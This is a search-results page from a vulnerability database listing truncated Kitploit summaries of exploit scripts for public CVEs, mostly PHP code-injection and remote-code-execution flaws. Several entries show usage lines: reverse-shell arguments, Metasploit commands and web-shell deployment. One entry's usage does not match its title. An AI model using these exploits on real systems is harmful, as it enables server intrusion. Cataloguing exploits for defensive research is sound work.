Lucene search
+L

1013 matches found

Kitploit
Kitploit
added 2026/09/16 2:42 a.m.7 views

CVE-2024-7954

CVE-2024-7954 - SPIP 4.2.8 Remote Command Execution RCE Exploit This script exploits a Remote Code Execution vulnerability in SPIP version 4.2.8 via the porteplumeprevisu endpoint. The vulnerability allows unauthenticated attackers to inject PHP code through preview rendering of crafted image tag...

9.8CVSS8.6AI score0.90053EPSS
SaveExploits10
Kitploit
Kitploit
added 2026/09/16 12:15 a.m.4 views

CVE-2023-46818-Exploit

CVE-2023-46818-Exploit This is my own exploit for CVE-2023-46818 happy hacking! This exploit automates the attack described in CVE-2023-46818 by taking advantage of a PHP code injection vulnerability in ISPConfig version 3.2.11 and earlier. It logs into the ISPConfig panel using valid credentials...

7.2CVSS7.3AI score0.15732EPSS
SaveExploits14
Kitploit
Kitploit
added 2026/09/15 9:26 p.m.3 views

CVE-2023-46818-python-exploit

CVE-2023-46818 exploit This is a python version of the original php script for the vulnerability affecting ispconfig 3.2.11 and previous versions. Original PHP source: https://packetstormsecurity.com/files/176126/ISPConfig-3.2.11-PHP-Code-Injection.html This proof-of-concept is intended for...

7.2CVSS7.7AI score0.15732EPSS
SaveExploits14
Kitploit
Kitploit
added 2026/09/15 7:42 p.m.7 views

pocs

minervais.com.phpMyAdminRCE.sh phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE POC. This was the first publicly-released exploit for CVE-2009-1151. Syntax root@kitploit: $ ./phpMyAdminRCE.sh usage: ./phpMyAdminRCE.sh i.e.: ./phpMyAdminRCE.sh http://target.tld/phpMyAdmin/ Demo root@kitploit...

9.8CVSS8.4AI score0.96565EPSS
SaveExploits17
Kitploit
Kitploit
added 2026/09/15 7:39 p.m.7 views

CVE-2024-43363

CVE-2024-43363 CVE-2024-43363 Exploit Script This Python script is designed to test if a Cacti instance is vulnerable to CVE-2024-43363, a Remote Code Execution RCE vulnerability caused by log poisoning. How the Vulnerability Works: root@kitploit: Log Poisoning: An attacker injects PHP code into...

7.2CVSS8.1AI score0.35599EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/15 6:30 p.m.8 views

Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

POC exploit for Dolibarr example: python3 exploit.py http://example.com login password 127.0.0.1 9001 ---Reverse Shell Exploit for Dolibarr = 17.0.0 CVE-2023-30253--- positional arguments: hostname Target hostname username Username of Dolibarr ERP/CRM password Password of Dolibarr ERP/CRM lhost...

8.8CVSS8AI score0.82094EPSS
SaveExploits16
Kitploit
Kitploit
added 2026/09/15 6:23 p.m.8 views

CVE-2020-8644-PlaySMS-1.4

CVE-2020-8644-PlaySMS-1.4 用于利用 PlaySMS 1.4.3 之前版本的 Python 脚本 执行 在你的机器上打开一个端口: 然后执行 exploit.py: root@kitploit: ./exploit.py 修改漏洞利用 你可能想要更改 exploit.py 创建的反弹 Shell 为此,你可以更改 exploit.py 第 14 到 19 行的函数 createrevshellencoded: root@kitploit: def createrevshellencodedlhost,lport: Change if you need revshe...

9.8CVSS8.5AI score0.86689EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/15 5:17 p.m.7 views

CVE-2023-46818

CVE-2023-46818 An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if adminallowlangedit is enabled. Usage root@kitploit: ❯ python3 CVE-2023-46818.py Usage: python3 CVE-2023-46818.py Poc of CVE-2023-46818 ISPConfig =...

7.2CVSS7.2AI score0.15732EPSS
SaveExploits14
Kitploit
Kitploit
added 2026/09/15 4:58 p.m.7 views

CVE-2026-3300

CVE-2026-3300 - Everest Forms Pro Unauthenticated Stored Cross-Site Scripting Quick Usage root@kitploit: python3 exploit.py -t "C:\Path\To\Target" -o demo.zip --data-file payload.exe Exploitation Notes Severity: CRITICAL CVSS: 9.8 Impact: Confidentiality, Integrity, Availability Published:...

9.8CVSS6.7AI score0.39159EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/15 3:20 p.m.8 views

CVE-2023-30253-PoC

CVE-2023-30253 CVE-2023-30253 PoC 描述 这是我对 CVE-2023-30253(Dolibarr 17.0.0 PHP 代码注入)的 PoC,当 CMS 网站插件(核心)被启用时,经过身份验证的攻击者可以通过绕过应用程序限制的 PHP 代码注入获得远程命令执行。 安装 克隆仓库: root@kitploit: git clone https://github.com/g4nkd/CVE-2023-30253-PoC.git cd CVE-2023-30253-PoC pip install -r requirements.txt 使用...

8.8CVSS8.1AI score0.82094EPSS
SaveExploits16
Kitploit
Kitploit
added 2026/09/15 2:45 p.m.15 views

CVE-2023-46818

Metasploit 模块 Metasploit 模块 root@kitploit: use exploit/linux/http/ispconfiglanguageedit set RHOSTS target.com set USERNAME admin set PASSWORD password123 set LHOST 127.0.0.1 set LPORT 4444 exploit 在 ISPConfig 3.2.11p1 之前版本中发现了一个问题。如果启用了 adminallowlangedit,管理员可以通过语言文件编辑器实现 PHP 代码注入。...

7.2CVSS7.4AI score0.15732EPSS
SaveExploits14
Kitploit
Kitploit
added 2026/09/15 12:58 p.m.8 views

CVE-2024-9162

CVE-2024-9162 All-in-One WP Migration and Backup = 7.86 - Authenticated Administrator+ Arbitrary PHP Code Injection The All-in-One WP Migration plugin for WordPress is vulnerable to arbitrary PHP Code Injection due to missing file type validation during the export in all versions up to, and...

7.2CVSS6.2AI score0.02745EPSS
SaveExploits1References2
Kitploit
Kitploit
added 2026/09/15 8:54 a.m.8 views

CVE-2024-9441

Nortek Linear eMerge E3 Pre-Auth RCE PoC CVE-2024-9441 Description: This repository contains a Proof of Concept PoC exploit for Nortek Linear eMerge E3 CVE-2024-9441, which is vulnerable to Remote Code Execution RCE in a pre-authentication state. The vulnerability is triggered via a flaw in the...

9.8CVSS6.5AI score0.53472EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/15 8:46 a.m.6 views

CVE-2023-46818

CVE-2023-46818 ISPConfig - PHP Code Injection PoC Exploit Bash CVE-2023-46818 Authenticated PHP Code Injection in ISPConfig for more details: advisory CVE-2023-46818 PoC Introduction ISPConfig versions Note: This exploit requires valid ISPConfig admin credentials and will deploy a command web she...

7.2CVSS8AI score0.15732EPSS
SaveExploits14
Kitploit
Kitploit
added 2026/09/15 7:48 a.m.9 views

CVE-2022-29359

School Club Application System Issue: Unauthenticated Stored Cross-Site Scripting to HTML injection to RCE Author: Zak Clifford Date: 12.04.2022 Vendor: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html Software:...

6.1CVSS6.7AI score0.0115EPSS
SaveExploits1References1
Kitploit
Kitploit
added 2026/09/15 7:42 a.m.6 views

CVE-2023-46818

CVE-2023-46818 ISPConfig - PHP Code Injection PoC Exploit Bash Introduction ISPConfig versions = 3.2.11 are vulnerable to an authenticated PHP code injection vulnerability via the records parameter in the /admin/languageedit.php endpoint. A malicious authenticated admin user can exploit this to...

7.2CVSS8AI score0.15732EPSS
SaveExploits14
Kitploit
Kitploit
added 2026/09/15 4:57 a.m.7 views

CVE-2021-40904

CVE-2021-40904 - RCE via CheckMk's Dokuwiki embedded application Application: CheckMK Management Web Console Software Revision: From 1.5.0 to 1.5.0p25 Attack type: RCE Solution: Upgrade to version 1.6 or higher. Summary: The web management console of CheckMk Raw Edition versions 1.5.0 to 1.5.0p25...

8.8CVSS8.3AI score0.03692EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/14 11:08 p.m.9 views

php-jpeg-injector

php-jpeg-injector 将php载荷注入jpeg图片中。相关帖子:this post 使用场景 你有一个通过PHP的GD图形库处理jpeg图片的web应用程序。 描述 此脚本将PHP代码注入到指定的jpeg图片中。如果web应用程序解释该图片,它将执行载荷。请确保输入的jpeg未被压缩! 用法 python3 gd-jpeg.py JPEG PAYLOAD OUTPUTJPEG 例如:python3 gd-jpeg.py cat.jpeg '' infectedcat.jpeg 工作原理 PHP代码被注入到扫描头之后的无用/垃圾(棕色)空间中:...

5.8AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/14 8:55 a.m.6 views

By-Poloss..-..CVE-2017-20251

CVE-2017-20251:Insert PHP 插件 PHP 代码注入 漏洞标题 在 Insert PHP 插件中通过短代码处理实现未认证 PHP 代码注入 基本信息...

9.8CVSS5.8AI score0.00559EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/14 5:22 a.m.5 views

CVE-2025-56399

CVE-2025-56399 – Authenticated Remote Code Execution in laravel-file-manager v3.3.1 🧭 Overview An authenticated Remote Code Execution RCE vulnerability in laravel-file-manager v3.3.1 and below allows attackers with access to the file manager interface to execute arbitrary code on the server. By...

8.8CVSS6.8AI score0.00556EPSS
SaveExploits2
Rows per page
Query Builder